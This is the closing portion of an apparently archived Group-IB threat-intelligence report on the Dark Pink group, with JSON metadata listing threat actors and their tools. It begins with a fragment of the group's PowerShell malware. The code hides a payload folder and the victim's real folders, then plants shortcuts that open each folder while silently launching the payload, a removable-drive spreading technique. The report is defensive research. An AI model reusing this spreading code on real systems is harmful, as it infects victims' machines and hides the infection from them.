('dism',\r\n$list_paths|%{if($null -eq $_){return}\r\ncp \"$env:temp\\xxx\" \"$_\\dism\" -Recurse -Force;\r\nsc \"$_\\system.bat\" -value \"@echo off`ncd %cd%dism`nstart dism.exe`nexit\";\r\nattrib +s +h \"$_\\dism\";attrib +s +h \"$_\\dism\\*.*\";attrib +s +h \"$_\\system.bat\";\r\n(Gci \"$_\\\" -Directory -force)|?{$_.name -notin ('dism','$RECYCLE.BIN','System Volu\r\n if($null -eq $_){return}\r\n attrib +s +h \"$($_.fullname)\"\r\n $WshShell = New-Object -comObject WScript.Shell\r\n $Shortcut = $WshShell.CreateShortcut(\"$($_.fullname).lnk\")\r\n $Shortcut.TargetPath = \"%SystemRoot%\\System32\\cmd.exe\"\r\n $Shortcut.Arguments = \"/c start explorer $($_.name) \u0026\u0026 system.bat \u0026\u0026 exit\"\r\n $Shortcut.IconLocation = \"%SystemRoot%\\System32\\SHELL32.dll,4\"\r\n $Shortcut.WorkingDirectory = \"%cd%\"\r\n $Shortcut.Save()}\r\n}}\r\nShare this article\r\nFound it interesting? Don't hesitate to share it to wow your friends or colleagues\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 25 of 27\n\nResources\r\nResearch Hub\r\nSuccess Stories\r\nKnowledge Hub\r\nCertificates\r\nWebinars\r\nPodcasts\r\nTOP Investigations\r\nRansomware Notes\r\nAI Cybersecurity Hub\r\nProducts\r\nThreat Intelligence\r\nFraud Protection\r\nManaged XDR\r\nAttack Surface Management\r\nDigital Risk Protection\r\nBusiness Email Protection\r\nCyber Fraud Intelligence\r\nPlatform\r\nUnified Risk Platform\r\nIntegrations\r\nPartners\r\nPartner Program\r\nMSSP and MDR Partner\r\nProgram\r\nTechnology Partners\r\nPartner Locator\r\nCompany\r\nAbout Group-IB\r\nTeam\r\nCERT-GIB\r\nCareers\r\nInternship\r\nAcademic Aliance\r\nSustainability\r\nMedia Center\r\nContact\r\nAPAC: +65 3159 3798\r\nSubscription plans Services Resource Center\r\nSubscribe to stay up to date with the\r\nlatest cyber threat trends\r\nContact\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 26 of 27\n\nEU \u0026 NA: +31 20 226 90 90\r\nMEA: +971 4 568 1785\r\ninfo@group-ib.com\r\n© 2003 – 2026 Group-IB is a global leader in the fight against cybercrime, protecting customers\r\naround the world by preventing breaches, eliminating fraud and protecting brands.\r\nTerms of Use Cookie Policy Privacy Policy\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 27 of 27", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia" ], "references": [ "https://www.group-ib.com/blog/dark-pink-episode-2/" ], "report_names": [ "dark-pink-episode-2" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "fd4c3ddd-11cc-4192-9c94-ff107d7f8492", "created_at": "2023-02-18T02:04:24.06294Z", "updated_at": "2026-04-10T02:00:04.644528Z", "deleted_at": null, "main_name": "Dark Pink", "aliases": [ "Saaiwc Group" ], "source_name": "ETDA:Dark Pink", "tools": [ "Ctealer", "Cucky", "KamiKakaBot", "LOLBAS", "LOLBins", "Living off the Land", "PowerSploit", "TelePowerBot", "ZMsg" ], "source_id": "ETDA", "reports": null }, { "id": "fbe45970-1e9e-4a82-bc06-46317a248479", "created_at": "2026-02-03T02:00:03.45132Z", "updated_at": "2026-04-10T02:00:03.947304Z", "deleted_at": null, "main_name": "DarkPink", "aliases": [ "Saaiwc" ], "source_name": "MISPGALAXY:DarkPink", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434269, "ts_updated_at": 1775792179, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/06a5539bcd70e3a9fafa4e2dfd13b2df57305d4d.pdf", "text": "https://archive.orkl.eu/06a5539bcd70e3a9fafa4e2dfd13b2df57305d4d.txt", "img": "https://archive.orkl.eu/06a5539bcd70e3a9fafa4e2dfd13b2df57305d4d.jpg" } }